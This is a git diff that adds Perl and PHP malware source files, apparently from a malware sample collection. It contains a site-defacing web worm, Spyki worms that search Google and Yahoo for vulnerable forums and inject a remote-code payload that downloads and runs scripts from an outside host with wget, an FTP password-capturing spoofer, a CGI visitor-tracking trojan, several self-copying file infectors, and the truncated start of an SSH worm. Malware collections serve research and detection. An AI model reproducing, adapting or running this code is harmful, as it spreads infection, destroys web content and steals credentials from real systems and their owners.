+if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}
+
+my $internet_addr = inet_aton($host) or return;
+socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
+setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);
+
+connect(Server, sockaddr_in($port, $internet_addr)) or return;
+select((select(Server), $| = 1)[0]);
+print Server $r;
+
+my $answer = join '', <Server>;
+close (Server);
+
+return $answer;
+}
+
+
+sub DoFile($) {
+my $s = q{
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
+<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
+<BODY bgcolor="#000000" text="#FF0000">
+<H1>This site is defaced!!!</H1>
+<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
+. $generation .q{.</b></ADDRESS>
+</BODY></HTML>
+};
+
+unlink $_[0];
+open OUT, ">$_[0]" or return;
+print OUT $s;
+close OUT;
+}
+
+
+sub DoDir($) {
+
+my $dir = $_[0];
+$dir .= '/' unless $dir =~ m#/$#;
+
+local *DIR;
+opendir DIR, $dir or return;
+
+for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {
+
+unless(-l $dir . $ent) {
+if(-d _) {
+DoDir($dir . $ent);
+next;
+}
+}
+
+if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i
+or $ent =~ /\.phtm/i) {
+DoFile($dir . $ent);
+}
+}
+
+closedir DIR;
+}
+
+
+sub Pay Load() {
+
+my @dirs;
+
+
+eval{
+while(my @a = getpwent()) { push(@dirs, $a[7]);}
+};
+
+push(@dirs, '/ ');
+
+for my $l ('A' .. 'Z') {
+push(@d
+for my $d (@dirs) {
+DoDir($d);
+}
+}
+//milw0rm.com
diff --git a/Perl/Net-Worm.Perl.Spyki.a b/Perl/Net-Worm.Perl.Spyki.a
new file mode 100644
index 00000000..d8546475
--- /dev/null
+++ b/Perl/Net-Worm.Perl.Spyki.a
@@ -0,0 +1,109 @@
+#/usr/bin/perl
+
+#####################
+####
+####  ####  #### #### ####  #### #### #  # #  # ####
+####  #  #  #  # #    #  #  #    #    #  # # #  #
+####  ####  #  # ###  ##    #### #    #### ##   ###
+####  #     #  # #    # #      # #    #  # # #  #
+####  #     #### #### #  #  #### #### #  # #  # ####
+####
+use IO::Socket;
+use LWP::Simple;
+my $processo = "/usr/local/sbin/httpd - spy";
+$SIG{"INT"} = "IGNORE";
+$SIG{"HUP"} = "IGNORE";
+$SIG{"TERM"} = "IGNORE";
+$SIG{"CHLD"} = "IGNORE";
+$SIG{"PS"} = "IGNORE";
+
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+while(1){
+@vul = "";
+$a=0;
+$numero = int rand(999);
+$site = "www.google.com";
+$procura = "inurl:viewtopic.php?t=$numero";
+
+######################################
+for($n=0;$n<900;$n += 10){
+$sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
+print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
+@resu = <$sock>;
+close($sock);
+$ae = "@resu";
+while ($ae=~ m/<a href=.*?>.*?<\/a>/){
+  $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
+  $uber=$1;
+if ($uber !~/translate/)
+{if ($uber !~ /cache/)
+{if ($uber !~ /"/)
+{if ($uber !~ /google/)
+{if ($uber !~ /216/)
+{if ($uber =~/http/)
+{if ($uber !~ /start=/)
+{
+if ($uber =~/&/)
+   {
+   $nu = index $uber, '&';
+   $uber = substr($uber,0,$nu);
+   }
+$vul[$a] = $uber;
+$a++;
+}}}}}}}}}
+##########################
+for($cadenu=1;$cadenu <= 991; $cadenu +=10){
+
+@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
+$ae = "@cade";
+
+while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
+  $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
+  $uber=$1;
+  
+$uber =~ s/ //g;
+$uber =~ s/<b>//g;
+$uber =~ s/<\/b>//g;
+$uber =~ s/<wbr>//g;
+
+if ($uber =~/&/)
+   {
+   $nu = index $uber, '&';
+   $uber = substr($uber,0,$nu);
+   }
+$vul[$a] = $uber;
+$a++
+}}
+
+#########################
+
+
+$wb = '&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527';
+
+
+$b = scalar(@vul);
+
+for($a=0;$a<=$b;$a++)
+{
+$sitevul = $vul[$a] . $wb;
+if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; }
+
+$teste1 = get($sitevul) or next;
+$teste1 = "";
+}
+}
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Perl/Net-Worm.Perl.Spyki.b b/Perl/Net-Worm.Perl.Spyki.b
new file mode 100644
index 00000000..5ebb03a6
--- /dev/null
+++ b/Perl/Net-Worm.Perl.Spyki.b
@@ -0,0 +1,212 @@
+
+use LWP::Simple;
+use IO::Socket::INET;
+
+
+
+
+my $processo = "/usr/local/sbin/httpd - spy";
+$SIG{"INT"} = "IGNORE";
+$SIG{"HUP"} = "IGNORE";
+$SIG{"TERM"} = "IGNORE";
+$SIG{"CHLD"} = "IGNORE";
+$SIG{"PS"} = "IGNORE";
+
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+while(1){
+$numr = int rand(9999);
+$caxe = ".";
+$caxe1 = ".";
+$caxe .= rand(9999);
+$caxe1 .= rand(9999);
+$arq = ".";
+$arq = int rand(9999);
+
+open(sites,">$arq");
+print sites "";
+close(sites);
+
+
+$procura = 'inurl:*.php?*=' . $numr;
+
+for($n=0;$n<900;$n += 10){
+$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
+print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
+@resu = <$sock>;
+close($sock);
+$ae = "@resu";
+while ($ae=~ m/<a href=.*?>.*?<\/a>/){
+  $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
+  $uber=$1;
+	if ($uber !~/translate/)
+	{
+	if ($uber !~ /cache/)
+	{
+	if ($uber !~ /"/)
+	{
+	if ($uber !~ /google/)
+	{
+	if ($uber !~ /216/)
+	{
+	if ($uber =~/http/)
+	{
+	if ($uber !~ /start=/)
+	{
+	  open(arq,">>$arq");
+          print arq "$uber\n";
+          close(arq);
+}}}}}}}}}
+
+
+for($cadenu=1;$cadenu <= 991; $cadenu +=10){
+
+@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
+$ae = "@cade";
+
+while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
+  $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
+  $uber=$1;
+  
+$uber =~ s/ //g;
+$uber =~ s/<b>//g;
+$uber =~ s/<\/b>//g;
+
+open(a,">>$arq");
+print a "$uber\n";
+close(a);
+}}
+
+$ark = $arq; 
+@si = "";
+open (arquivo,"<$ark");
+@si = <arquivo>;
+close(arquivo);
+$novo =""; 
+foreach (@si){
+if (!$si{$_})
+{ 
+$novo .= $_;
+$si{$_} = 1;
+}
+}
+open (arquivo,">$ark");
+print arquivo $novo;
+close(arquivo);
+
+
+$a =0;
+$b =0;
+open(ae,"<$arq");
+while(<ae>)
+ {$sites[$a] = $_;
+  chomp $sites[$a];
+  $a++;
+  $b++;}
+close(ae);
+
+for ($a=0;$a<=$b;$a++){
+open (file, ">$caxe");
+      print file "";
+close(file);
+open (file, ">$caxe1");
+      print file "";
+close(file);
+$k=0;
+$e=0;
+ $data=get($sites[$a]) or next;
+  while($data=~ m/<a href=".*?">.*?<\/a>/){
+  $data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
+  $ubersite=$1;
+  
+  if ($ubersite =~/"/)
+   {
+   $nu = index $ubersite, '"';
+   $ubersite = substr($ubersite,0,$nu);
+   }
+if ($ubersite !~/http/)
+ {$ubersite = $sites[$a].'/'.$ubersite;} 
+open(file,">>$caxe") || die("nao abriu caxe.txt $!");
+print file "$ubersite\n"; 
+close(file); 
+}
+
+$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt';
+$t =0;
+$y =0;
+@ja;
+open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
+while (<opa>)
+{
+ $ja[$t] = $_;
+ chomp $ja[$t];
+ $t++;
+ $y++;
+}
+close(opa);
+$t=1;
+while ($t < $y)
+   {
+    if ($ja[$t] =~/=/)
+      {
+       $num = rindex $ja[$t], '=';
+       $num += 1;
+       $ja[$t] = substr($ja[$t],0,$num);    
+            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
+            print jaera "$ja[$t]$lista1\n";
+            close(jaera);
+        $num = index $ja[$t], '=';
+        $num += 1;
+        $ja[$t] = substr($ja[$t],0,$num);       
+        $num1 = rindex $ja[$t], '.';
+        $subproc = substr($ja[$t],$num1,$num);
+         
+            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
+            print jaera "$ja[$t]$lista1\n";
+            close(jaera);
+      }
+     $t++;
+     }
+$ark = "$caxe1"; 
+@si = "";
+open (arquivo,"<$ark");
+@si = <arquivo>;
+close(arquivo);
+$novo =""; 
+foreach (@si){
+if (!$si{$_})
+{ 
+$novo .= $_;
+$si{$_} = 1;
+}
+}
+open (arquivo,">$ark");
+print arquivo $novo;
+close(arquivo);
+	$q=0;
+	$w=0;
+	 @hot;
+	open (ops,"<$caxe1");
+	while(<ops>)
+	{
+	$hot[$q] = $_;
+	chomp $hot[$q];
+	$q++;
+	$w++;
+	}
+	close(ops);
+
+for($q=0;$q<=$w;$q++)
+  {
+ 
+  if ($hot[$q] =~/http/)
+    {
+	$tipo=get($hot[$q]) or next;
+	}}
+
+
+}
+}
diff --git a/Perl/Spoofer.Perl.Nicl b/Perl/Spoofer.Perl.Nicl
new file mode 100644
index 00000000..d5ac79aa
--- /dev/null
+++ b/Perl/Spoofer.Perl.Nicl
@@ -0,0 +1,73 @@
+# This is a simple tcp server that listens on port 21
+# unless another is specified.  
+# The possible uses of this are;
+#  Ftp has no encryption for passwords and they are
+#  sent in plain text under the right conditions.
+#  Most ftp programs have a text file called <program-name>.ini
+#  which will store the info like site-name, user-name, encrypted
+#  password and account-name.  Instead of trying to decrypt the 
+#  password for each different application (ws_ftp etc)
+#  do this.  
+#    Edit the <program-name>.ini 
+#    Wherever there is a site-name change it to 127.0.0.1
+#    Start your this perl scipt
+#    Open your ftp program and click connect
+
+# Most of this coding was already in the /perl/eg/ folder
+# you can find the orginal version there .. 
+
+print "===========================\n";
+print " Manicx local FTP spoofer\n";
+print " www.infowar.co.uk/manicx/\n";
+print "===========================\n";
+
+($port) = @ARGV;
+$port = 21 unless $port;    # Are port is 21 unless specified
+
+$AF_INET = 2;
+$SOCK_STREAM = 1;
+
+$sockaddr = 'S n a4 x8';
+
+($name, $aliases, $proto) = getprotobyname('tcp');
+if ($port !~ /^\d+$/) { ($name, $aliases, $port) = getservbyport($port, 'tcp');}
+
+print "Port = $port\n";
+
+$this = pack($sockaddr, $AF_INET, $port, "\0\0\0\0");
+
+select(NS); $| = 1; select(stdout);
+
+socket(S, $AF_INET, $SOCK_STREAM, $proto) || die "socket: $!";
+bind(S,$this) || die "bind: $!";
+listen(S,5) || die "connect: $!";
+
+select(S); $| = 1; select(stdout);
+
+print "Listening for connection..\n";
+
+($addr = accept(NS,S)) || die $!;
+
+print "Accept ok\n";
+
+($af,$port,$inetaddr) = unpack($sockaddr,$addr);
+@inetaddr = unpack('C4',$inetaddr);
+
+print NS "220\n"; # We are ok for login (send username)
+$user = <NS>;
+print $user;
+
+print NS "331\n"; # user ok send password
+$pass = <NS>;
+print $pass;
+
+print NS "331\n"; # password ok send account
+$acco = <NS>;
+print $acco;
+
+print NS "200\n"; # account ok send what you want.
+
+$resp = <NS>;
+print $resp;
+
+print NS "451\n"; # bye bye baby
\ No newline at end of file
diff --git a/Perl/Trojan.Perl.InfoSpy b/Perl/Trojan.Perl.InfoSpy
new file mode 100644
index 00000000..f0702538
--- /dev/null
+++ b/Perl/Trojan.Perl.InfoSpy
@@ -0,0 +1,60 @@
+#/usr/bin/perl
+################################################
+#                                              #
+#**********************************************#
+#*    _           _                           *#
+#* |\_\\-\     /-//_/|                        *#
+#* |   \\-|   |-//   |                        *#
+#*  \ /~\\_____//~\ /                         *#
+#*   `   /     \   ┤                          *#
+#*      | () () |       Comando Trojan        *#
+#*       \  ^  /              -=-             *#
+#*        |||||    www.comandotrojan.cjb.net  *#
+#*        |||||                               *#
+#*                                            *#
+#**********************************************#
+#                                              #
+#    Vai Abaixo o CGI InfoSpy by iradium       #
+#                                              #
+#      Por Favor Preserve estas Linhas         #
+#                                              #
+#                 chmod 755                    #
+#                                              #
+################################################
+
+
+print "Content-type: text/html\n\n";
+
+$c = "contador.txt";
+#Nome do .txt log
+$mailprog = "/usr/sbin/sendmail -t"; 
+#Preste Atenчуo o real caminho do email no seu server
+$emailadm = "seu_email\@seu_site.com.br;
+#Deixe o \ no email
+$vitima = "lamer_entrou@se_fudeu.com";
+#Deixe como estar
+#Lembrar de fazer um domэnio tipo www.entrem.cjb.net e por index.cgi
+
+print <<EOF;
+ +++ Coloque aqui o html fictэcio para ser exibido +++
+EOF
+
+open (N, "$c");
+$n = <N>;
+close (N);
+
+$n++;
+
+open (NE, ">$c");
+print NE "$n";
+close (NE);
+
+                open (MAIL, "|$mailprog") || print "Can't open $mailprog
+.\n";
+                print MAIL "To: $vitima \n";
+                print MAIL "From: $emailadm\n";
+                print MAIL "Subject: Visita\n\n";
+                print MAIL "$ENV{'REMOTE_ADDR'} \n $ENV{'HTTP_USER_AGENT'} \n  $ENV{'REMOTE_HOST'} \n $ENV{'REMOTE_USER'} $n\n\n ";
+                close MAIL;
+
+#FIM DO ARQUIVO
\ No newline at end of file
diff --git a/Perl/Virus.Perl.DirWorm b/Perl/Virus.Perl.DirWorm
new file mode 100644
index 00000000..b2b7fc5b
--- /dev/null
+++ b/Perl/Virus.Perl.DirWorm
@@ -0,0 +1,13 @@
+# DirWorm by -Byst- (c) 1999
+while (<*>)                     # Ищем все ф йлы в текущей директории
+{
+  if (chdir($_)) {              # Если это директория - сменить текущую н  нее
+   @command = ("cp ../worm.pl ./worm.pl > /dev/null");
+   system @command;             # Вызов системной функции копиров ния ф йл 
+   chdir("..");                 # Возр щ емся обр тно в н ч льную директорию
+  }
+}
+@command = ("cp ./worm.pl ../worm.pl");
+system @command;                # Копируем тело в родительскую директорию
+
+
diff --git a/Perl/Virus.Perl.Endsnow.a b/Perl/Virus.Perl.Endsnow.a
new file mode 100644
index 00000000..3d1facc0
--- /dev/null
+++ b/Perl/Virus.Perl.Endsnow.a
@@ -0,0 +1,31 @@
+
+	opendir(DIR, "."); #open the directory this program is in
+	@FILES = readdir(DIR); #get the file names
+	closedir(DIR);
+	
+	## Look for programs to spread to (limited to the current directory for now)
+	for ($i = 0; $i < @FILES; $i++) {
+		if (substr($FILES[$i], length($FILES[$i]) - 4) eq ".cgi" || substr($FILES[$i], length($FILES[$i]) - 3) eq ".pl") {
+			$TARGETS[$ii] = $FILES[$i];
+			$ii++;
+		}
+	}
+	
+	for ($i = 0; $i < @TARGETS; $i++) {
+		open(FILE,$TARGETS[$i]);
+		$file = join("",<FILE>);
+		close(FILE);
+		if (index($file, "## Perl Virus Begins Now ##") == -1) { ##the file isn't infected, INFECT IT!! (append to it)
+			if ($me eq "") { #what we want to write hasn't been copied yet, this is a considerate virus, it could just keep copying itself each time and slow your computer down (and become a couple hundred bytes smaller)...
+				open(me,$0); #opens THIS program
+				$me = join("",<me>);
+				$start = index($me,"## Perl Virus Begins Now ##");
+				$me = substr($me, $start, rindex($me,"## Perl Virus Ends Now##") + 24 - $start);
+				close(me);
+			}
+			open(FILE,">>$TARGETS[$i]");
+			print FILE $me;
+			close(FILE);
+		}
+	}
+	closedir(DIR);
diff --git a/Perl/Virus.Perl.Intender b/Perl/Virus.Perl.Intender
new file mode 100644
index 00000000..17fa2fbe
--- /dev/null
+++ b/Perl/Virus.Perl.Intender
@@ -0,0 +1,66 @@
+#here virus starts
+# Intender by -Byst- (c) 1999
+$source = __FILE__;
+while (<*.pl>)
+{
+  $name = $_;                    # Имя ф йл -жертвы
+  $cname = crypt($name,$name);   # Имя промежуточного ф йл 
+
+  # Проверим не инфициров н ли уже ф йл?
+
+  open(TARGET,"<$name");         # жертв 
+  $allready_infected = 0;
+  while (<TARGET>) {
+   if (index($_,"\x23 Intender by -Byst- (c) 1999") == 0)
+    { $allready_infected = 1;}   # уже инфициров н!
+  }
+  close(TARGET);
+  if ($allready_infected == 1 )
+   { next;}                      # переходим к следующей жертве
+
+  # Проверим, нет ли в теле жертвы строк тип  !/usr/bin/perl
+  open(TARGET,"<$name");         # жертв 
+  $flag = 0;
+  while (<TARGET>) {
+   if (index($_,"\x23!") == 0)   # Н шли т кую строку
+    { $flag = 1;}                # взводим фл г
+  }
+  close(TARGET);
+
+  # Созд ем ч сть в которой содержится вызов процедуры инфициров ния
+  open(TARGET,"<$name");         # жертв 
+  open(FBUF,">$cname");          # промежуточный ф йл
+
+  if ($flag == 1) {              # у жертвы есть обозн чение н ч л  прогр ммы?
+   while (<TARGET>) {            # ищем его
+    print(FBUF);                 # сохр няем все строки жертвы до #!
+    if (index($_,"\x23!") == 0 ) #  г , вот и н ч ло прогр ммы
+      { last;}
+   }
+  }
+
+  # ищем тел  процедур
+  $_ = "\n";print(FBUF);
+  open(SOURCE,"<$source");       #  т кующий ф йл
+  while(<SOURCE>) {              # ищем призн к н ч л  - "#here virus starts"
+   if (index($_,"\x23here virus starts") == 0) { last;}
+  }
+  print(FBUF);
+  # весь текст процедур -> промежуточный ф йл
+  while (<SOURCE>) {
+   print(FBUF);
+   if (index($_,"\x23here virus ends") == 0) { last;}
+  }
+  close(SOURCE);
+  $_ = "\n";print(FBUF);
+  # ост вшуюся ч сть жертвы -> промежуточный ф йл
+  while (<TARGET>) {
+   print(FBUF);
+  }
+  close(TARGET);
+  close(FBUF);
+  rename($cname,$name);
+}
+#here virus ends
+
+
diff --git a/Perl/Virus.Perl.Nars b/Perl/Virus.Perl.Nars
new file mode 100644
index 00000000..93ee439e
--- /dev/null
+++ b/Perl/Virus.Perl.Nars
@@ -0,0 +1,43 @@
+Perl.Sran
+
+qwerty();#
+
+sub qwerty {
+
+a: while (<*.pl>)
+    {
+        my $oF = "qwerty";
+        my $tN = "$ENV{\"HOME\"}/tmp/".crypt($_, $_), $oN = "./$_", $nF = crypt($_, $oF);   
+            
+        open (WE, "<$0");                                       
+        open (IFILE, "<$_");
+        open (TEMP, ">$tN");                                    
+        
+            while (<IFILE>) 
+            {
+                chomp;
+                if (/\#!Sran/) { unlink ($tN); next a }         
+                elsif (!/#!\//) { print TEMP "$_\n" }
+                else { print TEMP "$_ #!Sran\n$nF();\n" }               
+            }
+            
+            while (<WE>)
+            {
+                $st = "";
+                
+                s/#[0-9].*/$st/;
+                if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/}
+                next if (/#!\/usr\/bin\/perl/ || /qwerty();#/ || !$cW);
+                if (int(rand(2))) { $st=" #".crypt($_, rand(256)) }
+                else {$st = ""}
+                
+                chomp;
+                print TEMP "$_$st\n";
+            }
+        
+        unlink ($oN);
+        rename ($tN, $oN);
+        chmod (0777, $oN);
+    }
+}
+
diff --git a/Perl/Virus.Perl.Nirvana b/Perl/Virus.Perl.Nirvana
new file mode 100644
index 00000000..4a86199a
--- /dev/null
+++ b/Perl/Virus.Perl.Nirvana
@@ -0,0 +1,30 @@
+# Nirvana RuLeZ the world
+# PERL.Nirvana
+# by Second Part To Hell
+
+# Thanks to SnakeByte for your tutorial!
+
+open(file,$0);
+@nirvana=<file>;
+@nirvana=@nirvana[0...31]
+close(file);
+
+foreach $FileName (<*>)
+{
+  if ((-r $FileName) && (-w $FileName) && (-f $FileName))
+  {
+    open (File, "$FileName");
+    @Lithium=<File>;
+    close(File);
+    if ((@Lithium[1] =~ "Nirvana") or (@Lithium[2] =~ "Nirvana"))
+    {
+      if((@Lithium[0] =~ "perl",,i) or (@Lithium[1] =~ "perl",,i))
+      {
+        open(sliver, ">$FileName");
+	print sliver @Nirvana;
+        print sliver @Litium;
+        close (sliver);
+      }
+    }
+  }
+}
diff --git a/Perl/Virus.Perl.Qwax b/Perl/Virus.Perl.Qwax
new file mode 100644
index 00000000..f197a618
--- /dev/null
+++ b/Perl/Virus.Perl.Qwax
@@ -0,0 +1,90 @@
+<?//QAZWSX
+
+function Infect($path)
+{
+        global $self;   
+
+        $handle = opendir($path); 
+
+        $file = readdir($handle);
+
+        while ( false != $file )
+        { 
+        if ($file != "." && $file != "..")
+        { 
+
+                if (is_dir($path.$file))
+                {
+                        Infect($path.$file."/");
+                }
+                else if (strrpos($file, ".php") != 0)
+                {
+                        $do_infect = true;
+
+                                $victim = fopen($path.$file, "r+");
+                                while (!feof($victim))
+                                {
+                                $buf = fgets($victim, 4096);
+                                        if (strrpos($buf, "QAZWSX") != 0)
+                                        {
+                                            $do_infect = false;
+                                            break;
+                                        }
+
+                                }
+
+                                if ($do_infect)
+                                {
+                                        fputs($victim, $self);
+                                }
+
+                                fclose($victim);
+                }
+
+        } 
+
+                $file = readdir($handle);
+        }
+
+        closedir($handle); 
+
+}
+
+
+$found = false;
+$bracket_found = false;
+
+$sf = fopen($SCRIPT_FILENAME, "r");
+
+while (!feof($sf))
+{
+        $s = fgets($sf, 4096);
+        if ($found)
+        {
+                $self .= $s;
+                if (strrpos($s, "?>") != 0)
+                {
+                        if ($bracket_found)
+                        {
+                                break;
+                        }
+                        else
+                        {
+                                $bracket_found = true;
+                        }
+                        
+                }
+        }
+        else if (strrpos($s, "QAZWSX") != 0)
+        {
+            $found = true;
+            $self = $s;
+        }
+
+}
+
+fclose($sf);
+
+Infect($DOCUMENT_ROOT."/");
+
+ ?>
\ No newline at end of file
diff --git a/Perl/Virus.Perl.Rans.a b/Perl/Virus.Perl.Rans.a
new file mode 100644
index 00000000..019e8777
--- /dev/null
+++ b/Perl/Virus.Perl.Rans.a
@@ -0,0 +1,41 @@
+
+qwerty();#
+
+sub qwerty {
+
+a: while (<*.pl>)
+    {
+        my $oF = "qwerty";
+        my $tN = "$ENV{\"HOME\"}/tmp/".crypt($_, $_), $oN = "./$_", $nF = crypt($_, $oF);   
+            
+        open (WE, "<$0");                                       
+        open (IFILE, "<$_");
+        open (TEMP, ">$tN");                                    
+        
+            while (<IFILE>) 
+            {
+                chomp;
+                if (/\#!Sran/) { unlink ($tN); next a }         
+                elsif (!/#!\//) { print TEMP "$_\n" }
+                else { print TEMP "$_ #!Sran\n$nF();\n" }               
+            }
+            
+            while (<WE>)
+            {
+                $st = "";
+                
+                s/#[0-9].*/$st/;
+                if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/}
+                next if (/#!\/usr\/bin\/perl/ || /qwerty();#/ || !$cW);
+                if (int(rand(2))) { $st=" #".crypt($_, rand(256)) }
+                else {$st = ""}
+                
+                chomp;
+                print TEMP "$_$st\n";
+            }
+        
+        unlink ($oN);
+        rename ($tN, $oN);
+        chmod (0777, $oN);
+    }
+}
diff --git a/Perl/Virus.Perl.Rans.b b/Perl/Virus.Perl.Rans.b
new file mode 100644
index 00000000..0f3c418a
--- /dev/null
+++ b/Perl/Virus.Perl.Rans.b
@@ -0,0 +1,47 @@
+sadBVa();
+
+print "This is also a test.\n";
+
+sub sadBVa {  #21wZPocL9r3I2
+  #25lj6HLJr3lR.
+    goto b if($ENV{"USER"} eq "root"); #403dRcOOEKV7c
+      #53a2B3OFfBrvE
+a: while (<*.pl>) 
+    { #11zR6D0l39gH2
+	my $oF = "sadBVa";  #21wZPocL9r3I2
+	my $tN = crypt($_, $_), $cW = 0; $oN = "./$_", $nF = $tN; #23xTGZMRTRgO.
+ #73QebE0Q0ZZ7Q
+	open (WE, "<$0");					
+	open (IF, "<$_");  #19ffqqT32W0N6
+	open (TMP, ">$tN");					  #21wZPocL9r3I2
+	 #46uAWbWZGiwdE
+	    $nF =~ s/[0-9.\/].*/a/; 
+	 #20DFf8jQEuujI
+	    while (<IF>) 
+	    {
+		chomp; #17rFB3rla0OL.
+		if (/\#!Sran/) { unlink ($tN); next a }		
+		elsif (!/#!\//) { print TMP "$_\n" } 
+		else { if(!/-X/){$_ .= " -X"} print TMP "$_\n#!Sran\n$nF();\n" }		
+	    } #14HPto765IJGs
+	      #56usvbQbO.V7g
+	    while (<WE>) 
+	    { 
+		$st = "";  #16DEAzgu4U/Lg
+		  #21wZPocL9r3I2
+		s/#[\d].*/$st/;
+		if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/}
+		next if (/#!\// || /$oF();/ || !$cW);
+		if (int(rand(2))) { $st=" #".crypt($tN, rand(256)) } 
+		else {$st = ""} #24kfAR.q3vZXI
+		 
+		chomp; #19ffqqT32W0N6
+		print TMP "$_$st\n"; #130lOPyQngaJw
+	    } 
+	  #21wZPocL9r3I2
+	unlink ($oN); 
+	rename ($tN, $oN);
+	chmod (0777, $oN);
+    }
+b:  #24kfAR.q3vZXI
+}  #25lj6HLJr3lR.
diff --git a/Perl/Virus.Perl.SSHWorm b/Perl/Virus.Perl.SSHWorm
new file mode 100644
index 00000000..6f3dcfff
--- /dev/null
+++ b/Perl/Virus.Perl.SSHWorm
@@ -0,0 +1,56 @@
+###############

+

+##

+# sshworm - example of a trusted host/key ssh worm

+# 

+# This is extremely primitive and rarely works on anything

+# but identical systems running the same versions of ssh.

+# It does show how using unencrypted RSA keys for user auth

+# across an enterprise can be a really bad thing.  Eventually

+# you should be able to let this guy go running as root on any

+# given system, it will locate each user's known_hosts and

+# attempt to gain accesss, reporting its path to a central system.

+#

+##

+

+

+use FindBin qw{$Bin};

+

+

